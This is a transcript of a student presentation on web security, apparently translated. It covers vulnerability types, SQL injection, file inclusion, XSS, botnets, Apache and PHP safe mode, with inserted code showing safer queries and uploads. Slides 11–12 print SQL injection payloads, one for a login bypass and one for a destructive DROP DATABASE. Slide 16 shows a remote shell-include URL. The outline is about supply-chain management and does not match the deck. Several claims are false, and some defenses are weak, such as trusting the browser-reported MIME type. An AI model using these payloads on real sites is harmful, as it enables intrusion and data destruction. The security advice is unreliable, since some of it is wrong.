
Web security



Presentation Transcript


  1. Web security. Prepared by: Arafat El-mdhon, Ahmed El-falouji “AnAs”. Supervised by: Ms. Iman El-ajrame

  2. Outline • Introduction • Supply Chain • Supply Chain Management • E-Supply Chain • E-Supply Chain Management • E-Supply Chain Transactions over the Internet • Infrastructure for E-SCM • Information Technology: A Supply Chain Enabler

  3. First, a definition: web security means maintaining the security of sites and servers through the following points:
     1 - Close all gaps
     2 - Update all programs
     3 - Install the required software
     4 - Follow up on gaps and close them
     5 - Follow up and check the server and the site for any software or system problem
     6 - Keep the system stable, without any problems
     7 - Check the system periodically
     8 - Choose the appropriate, stronger system

  4. The difference between operating systems with respect to information security: • First, the Linux system:
     1 - It is the strongest ever, for several reasons
     2 - It does not support many file formats, such as exe, which is the most serious
     3 - It gives little support to the viruses that other systems support
     4 - It is an open-source system, so any programmer is entitled to modify it for better and stronger protection
     5 - It defines the powers of each user and of the administrator
     6 - It supports programming languages flexibly
     7 - It opens the way for programmers to modify it further to make it safe, and to send what they have changed to the parent company of Linux
     8 - It is a strong system, since it is not used by just anyone, unlike a system such as Windows, and this maintains its strength in security

  5. Cont… • Second, the Windows system. Despite the flaws in the Windows system, it has advantages:
     1 - It is easy for users to use and is close to the systems that everyone is used to.
     2 - It supports all programming languages, such as PHP and its native ASP, while systems such as Linux do not support all programming languages.
     3 - It is difficult for a hacker to upload attack tools on Windows, because of the difference between sql server and msql.
     4 - Its control panels are much safer and less widespread.

  6. Cont… A gap is a software error in a script or program; in general, we can say it is a software error in the HTML or code, because this code can be a module, an add-on or a template. Of course, what we care about are the gaps that can be exploited. Kinds of gaps in systems and the web, and how to protect against them: Type I: server gaps. Type II: program gaps. Type III: site gaps.

  7. Gaps: Servers • These are loopholes in the server's system, in the kernel, or in the major programs that come with the server or the system. Exploiting these vulnerabilities poses a risk to the server because it leads to obtaining powers to change things or do things detrimental to the server. The things a server gap can cause are many, especially if the gap is in the kernel of the system itself and not in added software or the like, because an error in the kernel causes many problems that can be used in many ways, such as adding a new system manager, taking over the powers of the manager, tampering with the system settings, and many other things.

  8. Gaps in programs: • These are software errors in a program's code whose exploitation makes it possible to control the program and direct it to do certain things. How dangerous a gap is depends on the program's function and its powers on the system. Each gap differs from the others in type, direction and place of operation. For example, a gap in a program that runs with system administrator powers and is connected to the system and the kernel can be as dangerous as gaps in the system or the kernel itself. But a gap in a program that runs with ordinary powers, or even nobody powers, or powers that are not so great, will lead only to relatively simple actions or be less dangerous to the system. The seriousness of a gap depends on how the program relates to the kernel and on its powers on the server.

  9. Gaps: Sites • These are software errors in a script. Such an error can be used to extract information from the site, and some gaps give partial control of the site, which sometimes leads to the possibility of full control. The danger of site gaps is that the site is controlled, and then comes full control or access to the server and the server's files, which leads to a breach of the server.

  10. Types of site gaps: Cont… • Database injection gaps: these gaps consist of tampering with the values of the variables used in queries, to create a new query, based on the original query, that performs a particular function. Most manipulations aim to display data such as the username and password if they are stored in the database. In some cases the attacker has the authority to create files on the server or read files from it. These gaps are dangerous when the SQL server is not well protected and the attacker can use all the query functions.

  11. Cont… • They are serious even if the server is well protected, because they can reveal the user name and password for the site; control of the site or script leads to partial control, then full control, and then access to the server and other things. These gaps are among the most dangerous.
      • $user_name = "swalif";
        $password = "softs";
        // The variables are pasted straight into the SQL text (the vulnerable pattern)
        $query = "SELECT * FROM users WHERE user='$user_name' AND password='$password'";
        mysql_query($query);
      • Imagine if the password became:
        $password = "' OR ''='";
      • The SQL command becomes:
        $query = "SELECT * FROM users WHERE user='swalif' AND password='' OR ''=''";
        mysql_query($query);
      • In this way it may be possible to log in to the site's sections without a correct user name or password.

  12. Cont… • It does not stop at that. Imagine if this sentence were entered as the password:
      • $password = "'; DROP DATABASE database_name;";
      • The query then becomes:
      • $query = "SELECT * FROM users WHERE user='swalif' AND password=''; DROP DATABASE database_name;'";
        mysql_query($query);
      • Command Execution gaps: these gaps allow commands to be executed directly through one of the existing scripts. They are among the most serious gaps because they give access to the server directly, without the need for further action or time. They are similar to Remote File Include gaps in how they work, but more so.
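The login query from slides 11 and 12, rewritten with a prepared statement and a stored password hash. This is an added example, not code from the presentation; it assumes PDO with an in-memory SQLite database as a stand-in for the MySQL `users` table, and `check_login` is a hypothetical name.

```php
<?php
// Constructed in-memory table standing in for the slides' `users` table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (user TEXT PRIMARY KEY, password_hash TEXT NOT NULL)");

// Store a password hash, never the password itself.
$ins = $db->prepare("INSERT INTO users (user, password_hash) VALUES (?, ?)");
$ins->execute(['swalif', password_hash('softs', PASSWORD_DEFAULT)]);

/**
 * Check a login with a prepared statement: the user name is sent as a bound
 * parameter, so quotes inside it are data and cannot change the query.
 */
function check_login(PDO $db, string $user_name, string $password): bool
{
    $stmt = $db->prepare("SELECT password_hash FROM users WHERE user = ?");
    $stmt->execute([$user_name]);
    $hash = $stmt->fetchColumn();
    // The password is compared in PHP against the stored hash, not inside SQL.
    return $hash !== false && password_verify($password, $hash);
}

// Inputs from the slides, passed through the parameterized version.
$attempts = [
    ['swalif', 'softs'],                            // correct credentials
    ['swalif', "' OR ''='"],                        // slide 11 password
    ['swalif', "'; DROP DATABASE database_name;"],  // slide 12 password
    ["' OR ''='", 'anything'],                      // same string in the user field
];
foreach ($attempts as [$u, $p]) {
    $result = check_login($db, $u, $p) ? 'accepted' : 'rejected';
    printf("%-12s %-34s %s\n", $u, $p, $result);
}

// Count the rows afterwards to confirm the table was not touched.
echo $db->query("SELECT COUNT(*) FROM users")->fetchColumn(), " user row(s) remain\n";
```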

  13. • Local File Include: the process of including an internal file and executing the code inside it, or reading its contents if it is not code. It is used to read files, or to run a shell that the attacker was able to upload to the same server. It varies according to the conditions of exploitation and the code. • Remote File Include: the process of including an external file and introducing it into the application. It is more serious than local file include, because it does not require uploading a file to the same server, or even complying with conditions and searching for dots and paths, etc. All that is needed is an external shell, which is then included in any page. It is very close to command execution.

  14. Definition: • File Upload: gaps that make it possible to upload files to the server and execute their code. • File Disclosure: gaps that make it possible to read files on the server.

  15. First, XSS • These are serious gaps that are widely used, and they have two uses. The first use is to obtain all the information on the target device and all passwords. The other use is to exploit these passwords to hack sites. It relies on stealing the passwords of the targeted person. The sites most targeted are forums and tracker sites that contain a profile feature, because such a site supports placing small files in it, such as files containing HTML code; when a person visits the site, all of that person's passwords are stolen. The code is also exploited by injecting it into the site's links, to steal the passwords of each person who enters the site, including the site manager, and to steal his information, which leads to the site being hacked easily. It is also serious for global sites such as Hotmail and PayPal and sites that contain Visa data.

  16. Cont… • Protection: protection includes periodically cleaning the browser's cookies and disabling support for the features behind these gaps, such as the profile feature, HTML and the like. Second, File Include: one of the most dangerous gaps. These are gaps in the way certain files are included in the program, which allow the hacker to upload files through the gap, such as shells, even as a text file, which the hacker then browses to and easily takes control through. Uploading a shell means obtaining a command prompt on the system, whatever the server's system, Windows or Linux. For example: www.llllloooooz.com/web.php?r=http://shale.txt?

  17. Cont… • Here the shell was loaded through the variable of the affected site. This type of gap can have serious consequences, up to Root on the server. The best way to protect the server against this gap is to add a conditional statement, the following code, before the file upload code:
      • $var = $_FILES["file"]["type"];   // MIME type reported for the uploaded file
        if ($var == "application/x-php" or $var == "text/plain") {
            echo "error message";
        } else {
            // upload code
        }
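A stricter form of the two checks discussed on slides 16 and 17, as an added example that is not the presentation's code: the include parameter `r` only selects from a fixed map, and an upload is accepted by extension allowlist plus the type detected from the file's bytes rather than the type the browser reports. `PAGES`, `UPLOAD_TYPES`, `resolve_page` and `safe_upload_name` are hypothetical names, and the file contents are constructed.

```php
<?php
// File include: the parameter only selects a key; the path comes from this map.
const PAGES = ['home' => 'pages/home.php', 'news' => 'pages/news.php'];

function resolve_page(string $r): ?string
{
    // A URL or a "../" path is not a key, so it never reaches include.
    return array_key_exists($r, PAGES) ? PAGES[$r] : null;
}

// File upload: allowed extension => MIME type the content must have.
const UPLOAD_TYPES = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

function safe_upload_name(string $tmp_path, string $client_name): ?string
{
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, UPLOAD_TYPES)) {
        return null;                     // allowlist of extensions, not a blocklist
    }
    // Type detected from the stored bytes; $_FILES[...]["type"] is client-supplied.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmp_path);
    if ($detected !== UPLOAD_TYPES[$ext]) {
        return null;
    }
    // Server-chosen name: the client's file name never reaches the file system.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: the slide 16 value and two fake uploads in temp files.
var_dump(resolve_page('news'));
var_dump(resolve_page('http://shale.txt?'));

$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'x'; ?>");
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a" . str_repeat("\0", 16));
var_dump(safe_upload_name($php, 'avatar.png'));  // PHP source, image extension
var_dump(safe_upload_name($php, 'shell.php'));   // extension not on the allowlist
var_dump(safe_upload_name($gif, 'avatar.gif'));  // content and extension agree
unlink($php);
unlink($gif);
```

In a real handler the returned name would be passed to `move_uploaded_file()` with a directory outside the web root, and the path from `resolve_page()` would be the only thing ever given to `include`.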

  18. Bot Net Cont. A botnet carries out extremely strong direct attacks on the server, and many people today are unable to stop the attacks that take place through a botnet. This is the so-called DoS attack, a direct attack on the server that grows in an unorganized way, carried out by a particular method. For example, hackers penetrate 100 devices and direct those 100 devices at the server in an unorganized way. In this case the firewall fails to repel and prevent these attacks, because the attack also hits the firewall itself. A firewall cannot protect against attacks directed at the firewall itself, and such attacks depend on gaps in network protocols that cannot be done without.

  19. Cont… • Apache is a program that is installed on the server. It is excellent because it contains add-ons, such as FrontPage and encryption, and it supports many of the encryption systems used on the Web, which is good for programmers. It is installed on the server to provide many of the things the server needs for its task. Most importantly, it is what sets up the server and supports encodings, web systems, an image library and all such things. Despite its shortcomings and gaps, it is updated periodically, and the user can add new programs and additions to it. One of its powerful features is that it is designed to be modular: you can add any package to it to give it another capability without the need to change complicated things in the program.

  20. Cont… • The benefit of this design of Apache is that you add the things you really need and leave out the things you do not need, which raises the performance and speed of the server. For instance, if you want to take advantage of the features of FrontPage Extension, it is enough to add that package only. Apache is configured by editing lines in text files, which is very appropriate for programmers who rely on writing, but causes problems for those who are accustomed to a graphical interface. However, there is a program, Comanche, which, added to Apache, lets you control Apache's options through a graphical interface. One thing to pay attention to: after every change Apache must be restarted for the changes to take effect.

  21. Finally • Safe mode is very important on servers and must be enabled. Safe mode is either Off or On, and each has a meaning. When it is Off, users' data on the server is open and accessible to the other users of the server, which is a big problem; this case is found where there is only one site on the server, that is, nothing else. When it is On, safe mode is enabled, which is good for protecting the server and for protecting users' data from access by one another; this is what is usually found on servers.

  22. Cont… • Safe mode has other benefits, such as disabling programming functions that lead to penetration of the server and the like. Preventing certain programming functions is very important to prevent so-called symlink attacks and the tools that help hackers move between sites on the server.

  23. Thanks a lot to all of you. We hope it was a beneficial and interesting presentation. Best regards, Arafat El-mdhom, Ahmed El-falouji “AnAs”
